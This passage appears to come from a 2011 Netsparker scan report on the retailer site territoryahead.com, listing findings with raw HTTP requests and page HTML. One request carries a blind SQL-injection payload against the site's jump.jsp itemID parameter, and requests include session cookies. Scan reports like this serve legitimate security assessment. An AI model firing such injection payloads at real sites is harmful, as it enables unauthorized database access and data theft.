Tees;url=http://www.territoryahead.com/jump.jsp?itemID=38&itemType=CATEGORY&path=1%2C2%2C5%2C38;");aI("text=Dresses;url=http://www.territoryahead.com/jump.jsp?itemID=37&itemType=CATEGORY&path=1%2C2%2C5%2C37;");aI("text=Skirts;url=http://www.territoryahead.com/jump.jsp?itemID=36&itemType=CATEGORY&path=1%2C2%2C5%2C36;");aI("text=Pants & Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=35&itemType=CATEGORY&path=1%2C2%2C5%2C35;");aI("text=Petites;url=http://www.territoryahead.com/jump.jsp?itemID=170&itemType=CATEGORY&path=1%2C2%2C5%2C170;");aI("text=Womens Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=286&itemType=CATEGORY&path=1%2C2%2C5%2C286;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=166&itemType=CATEGORY&path=1%2C2%2C5%2C166;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=725&itemType=CATEGORY&path=1%2C2%2C5%2C725;");aI("text=Women's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1233&itemType=CATEGORY&path=1%2C2%2C5%2C1233;");}with(milonic=new menuname("Menu6")){style=menuStyle6;aI("text=Men's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=135&itemType=CATEGORY&path=1%2C2%2C6%2C135;");aI("text=Women's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=180&itemType=CATEGORY&path=1%2C2%2C6%2C180;");aI("text=Weekly Specials;url=http://www.territoryahead.com/jump.jsp?itemID=476&itemType=CATEGORY&path=1%2C2%2C6%2C476;");}
drawMenus();
</script>

</head>
<body class="main" >


<script language="javascript1.1" src="/text/cm/eluminate.js"></script>
<script language="javascript1.1" src="/text/cm/cmdatatagutils_territoryahead.js"></script>

<script language="javascript1.1" src="/includes/cm/cmtaggingservices_TTA_top.js"></script>




<div id="main-background"><div id="container">

<table align="center" border=0 width=980 cellpadding=0 cellspacing=0>
<tr>
<td colspan="5" class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
<td colspan=3 class=navheaderbg>





<table border=0 width=980 cellpadding=0 cellspacing=0>

<tr>
<td class="navheaderbg2"><a href="javascript:openMe('/text/customerservice/livechatpop.jsp?iProductID=','MoreInfo');"><img src="/images/us/global/globalnav/phnumber.gif" border="0" alt="1-800-882-4323" title="Live Chat"></a></td>
<td class="navheaderbg2" align="right"><table border="0" cellspacing="0" cellpadding="0" align="right">
<tr valign="middle">

<td><a href="https://www.territoryahead.com/account/login/loginmain.jsp" onMouseOver="rollover('top_login','/images/us/global/globalnav/login_on.gif');" onMouseOut="rollover('top_login','/images/us/global/globalnav/login_off.gif');"><img src="/images/us/global/globalnav/login_off.gif" border=0 alt="Log In" name="top_login"></a></td>

<td><a href="https://www.territoryahead.com/account/orderhistory/orderstatus.jsp" onMouseOver="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_on.gif');" onMouseOut="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_off.gif');"><img src="/images/us/global/globalnav/orderstatus_off.gif" border=0 alt="Order Status" name="top_orderstatus"></a></td>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=195&itemType=CATEGORY&path=1%2C3%2C195" onMouseOver="rollover('top_customerserv','/images/us/global/globalnav/customerserv_on.gif');" onMouseOut="rollover('top_customerserv','/images/us/global/globalnav/customerserv_off.gif');"><img src="/images/us/global/globalnav/customerserv_off.gif" border=0 alt="Customer Service" name="top_customerserv"></a></td>
<td><a href="http://www.territoryahead.com/shopping/catalogquickshop/cqsmain.jsp" onMouseOver="rollover('top_cqs','/images/us/global/globalnav/catquickshop_on.gif');" onMouseOut="rollover('top_cqs','/images/us/global/globalnav/catquickshop_off.gif');"><img src="/images/us/global/globalnav/catquickshop_off.gif" border=0 alt="Catalog Quickshop" name="top_cqs"></a></td>

<td class="navheaderbg3"><a href="http://www.territoryahead.com/basket/basketmain.jsp" onMouseOver="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_on.gif');" onMouseOut="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_off.gif');"><img src="/images/us/global/globalnav/shopbasket_off.gif" border=0 alt="Shopping Bag" name="top_shopbasket"></a></td>
<td class="navheaderbg3"><div class="iteminbagtext" nowrap>  (0 items) </div></td>
</tr>
</table></td>
</tr>
<tr>
<td colspan="2" class="navheaderrule1"><img src="/images/us/global/globalgraphics/spacer01.gif" width="980" height="1" border="0" alt=""></td>
</tr>
<tr>
<td colspan="2"><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE"><img alt="The Territory Ahead" src="/images/us/global/globalnav/logo01.jpg" border="0"></a></td>
</tr>
<tr>
<td colspan="2"><table id="menu" border="0" cellspacing="0" cellpadding="0" width="980">
<tr>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE" onMouseOver="rollover('top_home','/images/us/global/globalnav/home_on.gif');" onMouseOut="rollover('top_home','/images/us/global/globalnav/home_off.gif');"><img src="/images/us/global/globalnav/home_off.gif" border=0 alt="Home" name="top_home"></a></td>
<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=1057&path=1%2C2%2C1057' onmouseover="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_on.gif');popup('Menu1057','MenuImg1057');" onmouseout="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_off.gif');popdown();"><img border="0" name="MenuImg1057" id="MenuImg1057" src="/images/us/global/globalnav/globalnav04_off.gif" alt="What's New"></a></td>

<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4' onmouseover="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_on.gif');popup('Menu4','MenuImg4');" onmouseout="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_off.gif');popdown();"><img border="0" name="MenuImg4" id="MenuImg4" src="/images/us//global/globalnav/globalnav01_off.gif" alt="Men's Territory"></a></td>
<!--<td><a href="http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4" onMouseOver="rollover('LeftMen's Territory','/images/us//global/globalnav/globalnav01_on.gif');" onMouseOut="rollover('LeftMen's Territory','/images/us//global/globalnav/globalnav01_off.gif');"><img border="0" name="LeftMen's Territory" src="/images/us//global/globalnav/globalnav01_off.gif" alt=..

Cookie Not Marked As HttpOnly

1 TOTAL

LOW

CONFIRMED

Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

See the remedy for solution
Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /jump.jsp

/jump.jsp CONFIRMED

https://www.territoryahead.com/jump.jsp

Identified Cookie

order

Request

Response

ORACLE Server Identified

1 TOTAL

INFORMATION

CONFIRMED

Netsparker identified that the target web site is using an ORACLE Server. This is generally not a security issue and is reported here only for information purposes.

Impact

This issue is reported for information purposes only, there is no direct impact resulting from this issue.

- /jump.jsp

/jump.jsp CONFIRMED

https://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=-1%20OR%201=1%20AND%20NVL(ASCII(SUB..

Request

GET /jump.jsp?itemType=CATEGORY&itemID=-1%20OR%201=1%20AND%20NVL(ASCII(SUBSTR((SELECT%20chr(78)%7C%7Cchr(69)%7C%7Cchr(84)%7C%7Cchr(83)%7C%7Cchr(80)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(75)%7C%7Cchr(69)%7C%7Cchr(82)%20FROM%20DUAL),5,1)),0)=88--&path=1%2C2%2C195%2C241 HTTP/1.1
Referer: https://www.territoryahead.com/jump.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62381532; customer=92645377; mmlID=68409741; JSESSIONID=bY2TfXuSpmEe; RecentViewedItems=9687/3443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 19:29:24 GMT
Server: Apache
ETag: "AAAAS54AbmT"
Last-Modified: Wed, 02 Mar 2011 19:18:22 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="verify-v1" content="rSy1zNijA/te2NarLBOsqhIUGqxdoT7f9S8BYMrWFPg=" /><meta name="google-site-verification" content="Um1CvuVrWJqj36YpfI1-Aewx8_Xa-Ta58nlcpShy5XE" /><meta name="google-site-verification" content="BVV5owrN07EKc9WhcJpgHTWzZetedjsz5KmSE60see0" />

<title>The Territory Ahead</title>

<link rel='stylesheet' type='text/css' href='/includes/stylesheet.css' title='style'>
<link rel='stylesheet' type='text/css' href='/includes/global_stylesheet.css' title='style'>

<link rel='stylesheet' type='text/css' href='/text/css/tta_stylesheet.css' title='style'>



<script type="text/javascript" src="/includes/flyopen.js"></script>
<script type="text/javascript" src="/includes/rollover.js"></script>
<script type="text/javascript" src="/includes/cleartext.js"></script>
<script type="text/javascript" src="/text/js/sitedisplay.js"></script>

<script type="text/javascript">

</script>

<script type="text/javascript">
arImageList = new Array ();
arSubImageList = new Array ();

function preLoadCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arImageList[loop] = new Image();
arImageList[loop].src = images_array[loop];
}
}
function preLoadSubCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arSubImageList[loop] = new Image();
arSubImageList[loop].src = images_array[loop];
}
}
function changeCat(frm, thisbox) {
var optiontxt = thisbox.options[thisbox.selectedIndex].value;
if (optiontxt == "0"){
return;
}
location.href = optiontxt
//frm.action = optiontxt;
//alert (frm.action);
//frm.submit();
}

</script>

<script type="text/javascript" src="/menu/milonic_src.js"></script>
<script type="text/javascript">

</script>

<script type="text/javascript">

/*
Milonic DHTML Menu - JavaScript Website Navigation System.
Copyright 2004 (c) Milonic Solutions Limited. All Rights Reserved.
Version 5+ Data File structure is the property of Milonic Solutions Ltd and must only be used in Milonic DHTML Products
This is a commercial software product, please visit http://www.milonic.com/ for more information.
See http://www.milonic.com/license.php for Commercial License Agreement
All Copyright statements must always remain in place in all files at all times
******* PLEASE NOTE: THIS IS NOT FREE SOFTWARE, IT MUST BE LICENSED FOR ALL USE *******
*/

_menuCloseDelay=450 // The time delay for menus to remain visible on mouse out
_menuOpenDelay=80 // The time delay before menus open on mouse over
_subOffsetTop=0 // Sub menu top offset
_subOffsetLeft=-15 // Sub menu left offset

with(menuStyle=new mm_style()){
itemwidth=100;
onclass="menuItemOn";
offclass="menuItemOff";
onbgcolor="#FFFFFF";
oncolor="#000000";
onborder='1px solid #000000';
offbgcolor="#FFFFFF";
offcolor="#000000";
offborder='1px solid #000000';
bordercolor="#000000";
borderstyle="solid";
borderwidth=1;
separatorcolor="#FFFAF5";
separatorsize="0";
fontsize="11px";
fontstyle="normal";
fontfamily="Verdana, Tahoma, Arial";
pagebgcolor="#FFFAF5";
headercolor="#FFFFFF";
headerbgcolor="#ffffff";
subimagepadding="0";
overfilter="Fade(duration=0.0);Alpha(opacity=100);";
outfilter="randomdissolve(duration=0.0)";
}
with(menuStyle1057=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle4=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle5=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle6=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(milonic=new menuname("Menu1057")){style=menuStyle1057;aI("text=Men's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1058&itemType=CATEGORY&path=1%2C2%2C1057%2C1058;");aI("text=Women's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1064&itemType=CATEGORY&path=1%2C2%2C1057%2C1064;");}with(milonic=new menuname("Menu4")){style=menuStyle4;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=431&itemType=CATEGORY&path=1%2C2%2C4%2C431;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=25&itemType=CATEGORY&path=1%2C2%2C4%2C25;");aI("text=Sport Coats;url=http://www.territoryahead.com/jump.jsp?itemID=24&itemType=CATEGORY&path=1%2C2%2C4%2C24;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=341&itemType=CATEGORY&path=1%2C2%2C4%2C341;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=14&itemType=CATEGORY&path=1%2C2%2C4%2C14;");aI("text=Sweaters & Pullovers;url=http://www.territoryahead.com/jump.jsp?itemID=26&itemType=CATEGORY&path=1%2C2%2C4%2C26;");aI("text=T-Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=534&itemType=CATEGORY&path=1%2C2%2C4%2C534;");aI("text=Polos;url=http://www.territoryahead.com/jump.jsp?itemID=15&itemType=CATEGORY&path=1%2C2%2C4%2C15;");aI("text=Pants;url=http://www.territoryahead.com/jump.jsp?itemID=27&itemType=CATEGORY&path=1%2C2%2C4%2C27;");aI("text=Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=28&itemType=CATEGORY&path=1%2C2%2C4%2C28;");aI("text=Tall Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=134&itemType=CATEGORY&path=1%2C2%2C4%2C134;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=720&itemType=CATEGORY&path=1%2C2%2C4%2C720;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=29&itemType=CATEGORY&path=1%2C2%2C4%2C29;");aI("text=Guy Stuff Luggage & Bags;url=http://www.territoryahead.com/jump.jsp?itemID=192&itemType=CATEGORY&path=1%2C2%2C4%2C192;");aI("text=Men's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1232&itemType=CATEGORY&path=1%2C2%2C4%2C1232;");}with(milonic=new menuname("Menu5")){style=menuStyle5;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=32&itemType=CATEGORY&path=1%2C2%2C5%2C32;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=33&itemType=CATEGORY&path=1%2C2%2C5%2C33;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=440&itemType=CATEGORY&path=1%2C2%2C5%2C440;");aI("text=Sweaters;url=http://www.territoryahead.com/jump.jsp?itemID=31&itemType=CATEGORY&path=1%2C2%2C5%2C31;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=39&itemType=CATEGORY&path=1%2C2%2C5%2C39;");aI("text=Knit Tops & Tees;url=http://www.territoryahead.com/jump.jsp?itemID=38&itemType=CATEGORY&path=1%2C2%2C5%2C38;");aI("text=Dresses;url=http://www.territoryahead.com/jump.jsp?itemID=37&itemType=CATEGORY&path=1%2C2%2C5%2C37;");aI("text=Skirts;url=http://www.territoryahead.com/jump.jsp?itemID=36&itemType=CATEGORY&path=1%2C2%2C5%2C36;");aI("text=Pants & Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=35&itemType=CATEGORY&path=1%2C2%2C5%2C35;");aI("text=Petites;url=http://www.territoryahead.com/jump.jsp?itemID=170&itemType=CATEGORY&path=1%2C2%2C5%2C170;");aI("text=Womens Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=286&itemType=CATEGORY&path=1%2C2%2C5%2C286;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=166&itemType=CATEGORY&path=1%2C2%2C5%2C166;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=725&itemType=CATEGORY&path=1%2C2%2C5%2C725;");aI("text=Women's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1233&itemType=CATEGORY&path=1%2C2%2C5%2C1233;");}with(milonic=new menuname("Menu6")){style=menuStyle6;aI("text=Men's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=135&itemType=CATEGORY&path=1%2C2%2C6%2C135;");aI("text=Women's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=180&itemType=CATEGORY&path=1%2C2%2C6%2C180;");aI("text=Weekly Specials;url=http://www.territoryahead.com/jump.jsp?itemID=476&itemType=CATEGORY&path=1%2C2%2C6%2C476;");}
drawMenus();
</script>

</head>
<body class="main" >


<script language="javascript1.1" src="/text/cm/eluminate.js"></script>
<script language="javascript1.1" src="/text/cm/cmdatatagutils_territoryahead.js"></script>

<script language="javascript1.1" src="/includes/cm/cmtaggingservices_TTA_top.js"></script>




<div id="main-background"><div id="container">

<table align="center" border=0 width=980 cellpadding=0 cellspacing=0>
<tr>
<td colspan="5" class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
<td colspan=3 class=navheaderbg>





<table border=0 width=980 cellpadding=0 cellspacing=0>

<tr>
<td class="navheaderbg2"><a href="javascript:openMe('/text/customerservice/livechatpop.jsp?iProductID=','MoreInfo');"><img src="/images/us/global/globalnav/phnumber.gif" border="0" alt="1-800-882-4323" title="Live Chat"></a></td>
<td class="navheaderbg2" align="right"><table border="0" cellspacing="0" cellpadding="0" align="right">
<tr valign="middle">

<td><a href="https://www.territoryahead.com/account/login/loginmain.jsp" onMouseOver="rollover('top_login','/images/us/global/globalnav/login_on.gif');" onMouseOut="rollover('top_login','/images/us/global/globalnav/login_off.gif');"><img src="/images/us/global/globalnav/login_off.gif" border=0 alt="Log In" name="top_login"></a></td>

<td><a href="https://www.territoryahead.com/account/orderhistory/orderstatus.jsp" onMouseOver="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_on.gif');" onMouseOut="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_off.gif');"><img src="/images/us/global/globalnav/orderstatus_off.gif" border=0 alt="Order Status" name="top_orderstatus"></a></td>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=195&itemType=CATEGORY&path=1%2C3%2C195" onMouseOver="rollover('top_customerserv','/images/us/global/globalnav/customerserv_on.gif');" onMouseOut="rollover('top_customerserv','/images/us/global/globalnav/customerserv_off.gif');"><img src="/images/us/global/globalnav/customerserv_off.gif" border=0 alt="Customer Service" name="top_customerserv"></a></td>
<td><a href="http://www.territoryahead.com/shopping/catalogquickshop/cqsmain.jsp" onMouseOver="rollover('top_cqs','/images/us/global/globalnav/catquickshop_on.gif');" onMouseOut="rollover('top_cqs','/images/us/global/globalnav/catquickshop_off.gif');"><img src="/images/us/global/globalnav/catquickshop_off.gif" border=0 alt="Catalog Quickshop" name="top_cqs"></a></td>

<td class="navheaderbg3"><a href="http://www.territoryahead.com/basket/basketmain.jsp" onMouseOver="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_on.gif');" onMouseOut="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_off.gif');"><img src="/images/us/global/globalnav/shopbasket_off.gif" border=0 alt="Shopping Bag" name="top_shopbasket"></a></td>
<td class="navheaderbg3"><div class="iteminbagtext" nowrap>  (0 items) </div></td>
</tr>
</table></td>
</tr>
<tr>
<td colspan="2" class="navheaderrule1"><img src="/images/us/global/globalgraphics/spacer01.gif" width="980" height="1" border="0" alt=""></td>
</tr>
<tr>
<td colspan="2"><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE"><img alt="The Territory Ahead" src="/images/us/global/globalnav/logo01.jpg" border="0"></a></td>
</tr>
<tr>
<td colspan="2"><table id="menu" border="0" cellspacing="0" cellpadding="0" width="980">
<tr>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE" onMouseOver="rollover('top_home','/images/us/global/globalnav/home_on.gif');" onMouseOut="rollover('top_home','/images/us/global/globalnav/home_off.gif');"><img src="/images/us/global/globalnav/home_off.gif" border=0 alt="Home" name="top_home"></a></td>
<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=1057&path=1%2C2%2C1057' onmouseover="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_on.gif');popup('Menu1057','MenuImg1057');" onmouseout="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_off.gif');popdown();"><img border="0" name="MenuImg1057" id="MenuImg1057" src="/images/us/global/globalnav/globalnav04_off.gif" alt="What's New"></a></td>

<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4' onmouseover="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_on.gif');popup('Menu4','MenuImg4');" onmouseout="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_off.gif');popdown();"><img border="0" name="MenuImg4" id="MenuImg4" src="/images/us//global/globalnav/globalnav01_off.gif" alt="Men's Territory"></a></td>

<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=5&path=1%2C2%2C5' onmouseover="rollover('MenuImg5','/images/us..

E-mail Address Disclosure

1 TOTAL

INFORMATION

Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

Wikipedia - E-Mail Spam

- /jump.jsp

/jump.jsp

https://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=936

Found E-mails

territoryahead@shop.territoryahead.com

Request

GET /jump.jsp?itemType=CATEGORY&itemID=936 HTTP/1.1
Referer: https://www.territoryahead.com/jump.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62381532; customer=92645377; mmlID=68409825; JSESSIONID=bNpe-F-pUdie
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:25:39 GMT
Server: Apache
ETag: "AAAAS53/keK"
Last-Modified: Wed, 02 Mar 2011 19:14:36 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="verify-v1" content="rSy1zNijA/te2NarLBOsqhIUGqxdoT7f9S8BYMrWFPg=" /><meta name="google-site-verification" content="Um1CvuVrWJqj36YpfI1-Aewx8_Xa-Ta58nlcpShy5XE" /><meta name="google-site-verification" content="BVV5owrN07EKc9WhcJpgHTWzZetedjsz5KmSE60see0" />

<title>Sign Up - The Territory Ahead</title>

<link href="http://www.territoryahead.com/jump.jsp?itemID=936&itemType=CATEGORY" rel="canonical" />

<link rel='stylesheet' type='text/css' href='/includes/stylesheet.css' title='style'>
<link rel='stylesheet' type='text/css' href='/includes/global_stylesheet.css' title='style'>

<link rel='stylesheet' type='text/css' href='/text/css/tta_stylesheet.css' title='style'>



<script type="text/javascript" src="/includes/flyopen.js"></script>
<script type="text/javascript" src="/includes/rollover.js"></script>
<script type="text/javascript" src="/includes/cleartext.js"></script>
<script type="text/javascript" src="/text/js/sitedisplay.js"></script>

<script type="text/javascript">

</script>

<script type="text/javascript">
arImageList = new Array ();
arSubImageList = new Array ();

function preLoadCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arImageList[loop] = new Image();
arImageList[loop].src = images_array[loop];
}
}
function preLoadSubCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arSubImageList[loop] = new Image();
arSubImageList[loop].src = images_array[loop];
}
}
function changeCat(frm, thisbox) {
var optiontxt = thisbox.options[thisbox.selectedIndex].value;
if (optiontxt == "0"){
return;
}
location.href = optiontxt
//frm.action = optiontxt;
//alert (frm.action);
//frm.submit();
}

</script>

<script type="text/javascript" src="/menu/milonic_src.js"></script>
<script type="text/javascript">

</script>

<script type="text/javascript">

/*
Milonic DHTML Menu - JavaScript Website Navigation System.
Copyright 2004 (c) Milonic Solutions Limited. All Rights Reserved.
Version 5+ Data File structure is the property of Milonic Solutions Ltd and must only be used in Milonic DHTML Products
This is a commercial software product, please visit http://www.milonic.com/ for more information.
See http://www.milonic.com/license.php for Commercial License Agreement
All Copyright statements must always remain in place in all files at all times
******* PLEASE NOTE: THIS IS NOT FREE SOFTWARE, IT MUST BE LICENSED FOR ALL USE *******
*/

_menuCloseDelay=450 // The time delay for menus to remain visible on mouse out
_menuOpenDelay=80 // The time delay before menus open on mouse over
_subOffsetTop=0 // Sub menu top offset
_subOffsetLeft=-15 // Sub menu left offset

with(menuStyle=new mm_style()){
itemwidth=100;
onclass="menuItemOn";
offclass="menuItemOff";
onbgcolor="#FFFFFF";
oncolor="#000000";
onborder='1px solid #000000';
offbgcolor="#FFFFFF";
offcolor="#000000";
offborder='1px solid #000000';
bordercolor="#000000";
borderstyle="solid";
borderwidth=1;
separatorcolor="#FFFAF5";
separatorsize="0";
fontsize="11px";
fontstyle="normal";
fontfamily="Verdana, Tahoma, Arial";
pagebgcolor="#FFFAF5";
headercolor="#FFFFFF";
headerbgcolor="#ffffff";
subimagepadding="0";
overfilter="Fade(duration=0.0);Alpha(opacity=100);";
outfilter="randomdissolve(duration=0.0)";
}
with(menuStyle1057=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle4=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle5=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle6=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(milonic=new menuname("Menu1057")){style=menuStyle1057;aI("text=Men's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1058&itemType=CATEGORY&path=1%2C2%2C1057%2C1058;");aI("text=Women's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1064&itemType=CATEGORY&path=1%2C2%2C1057%2C1064;");}with(milonic=new menuname("Menu4")){style=menuStyle4;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=431&itemType=CATEGORY&path=1%2C2%2C4%2C431;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=25&itemType=CATEGORY&path=1%2C2%2C4%2C25;");aI("text=Sport Coats;url=http://www.territoryahead.com/jump.jsp?itemID=24&itemType=CATEGORY&path=1%2C2%2C4%2C24;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=341&itemType=CATEGORY&path=1%2C2%2C4%2C341;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=14&itemType=CATEGORY&path=1%2C2%2C4%2C14;");aI("text=Sweaters & Pullovers;url=http://www.territoryahead.com/jump.jsp?itemID=26&itemType=CATEGORY&path=1%2C2%2C4%2C26;");aI("text=T-Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=534&itemType=CATEGORY&path=1%2C2%2C4%2C534;");aI("text=Polos;url=http://www.territoryahead.com/jump.jsp?itemID=15&itemType=CATEGORY&path=1%2C2%2C4%2C15;");aI("text=Pants;url=http://www.territoryahead.com/jump.jsp?itemID=27&itemType=CATEGORY&path=1%2C2%2C4%2C27;");aI("text=Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=28&itemType=CATEGORY&path=1%2C2%2C4%2C28;");aI("text=Tall Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=134&itemType=CATEGORY&path=1%2C2%2C4%2C134;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=720&itemType=CATEGORY&path=1%2C2%2C4%2C720;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=29&itemType=CATEGORY&path=1%2C2%2C4%2C29;");aI("text=Guy Stuff Luggage & Bags;url=http://www.territoryahead.com/jump.jsp?itemID=192&itemType=CATEGORY&path=1%2C2%2C4%2C192;");aI("text=Men's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1232&itemType=CATEGORY&path=1%2C2%2C4%2C1232;");}with(milonic=new menuname("Menu5")){style=menuStyle5;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=32&itemType=CATEGORY&path=1%2C2%2C5%2C32;");aI("text=Leather 